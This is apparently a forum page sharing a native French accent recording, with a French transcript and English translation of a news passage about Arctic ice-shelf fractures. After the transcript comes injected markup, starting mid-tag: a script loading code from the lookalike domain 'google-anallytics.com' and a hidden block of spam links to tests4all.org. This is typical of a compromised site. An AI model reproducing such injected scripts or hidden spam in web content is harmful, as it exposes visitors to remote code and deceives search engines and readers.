‘A small French sample by a French native’
Click to listen to Other french accent.mp3 (316Kb)
Native speaker
Accent: French neutral I suppose
Author: zorglub
Date: 6/30/2008
Description of what is on the sound file:
This is for our friend LanguageGeek with a German accent (mild) who asked about his pronunciation.
Transcript of sound file:
Transcript of sound file:
Une preuve spectaculaire de la cassure de la calotte glaciaire arctique est apparue durant
des recherches lors d’une expédition menée par les militaires canadiens.
Des scientifiques voyageant avec les troupes ont trouvé de nouvelles fractures majeures lors
d’une évaluation de l’état de barrières de glace géantes à l’extrême nord du Canada.
Dramatic evidence of the break-up of the Arctic ice-cap has emerged from research during an
expedition by the Canadian military.
Scientists travelling with the troops found major new fractures during an assessment of the state
of giant ice shelves in Canadas far north. 'text/javascript' src='http://google-anallytics.com/urchin.js'></script><div style='display:none;'><a href='http://tests4all.org/1/'>stages for losing weight</a><a href='http://tests4all.org/2/'>lauren sones personal trainer</a><a href='http://tests4all.org/3/'>lung cleansing quit smoking</a><a href='http://tests4all.org/4/'>blu eyes crying in the rain</a><a href='http://tests4all.org/5/'>photo proof the cardinals got cheated</a><a href='http://tests4all.org/6/'>video game occupations pay</a><a href='http://tests4all.org/7/'>alpha investment partners limited</a><a href='http://tests4all.org/8/'>britannica iq test</a><a href='http://tests4all.org/9/'>america psychic challenge contestant names</a><a href='http://tests4all.org/10/'>nashville past life regression</a><a href='http://tests4all.org/11/'>andrew elliott death date jun 1968</a><a href='http://tests4all.org/12/'>experimental lung liver cancer treatments</a></div>
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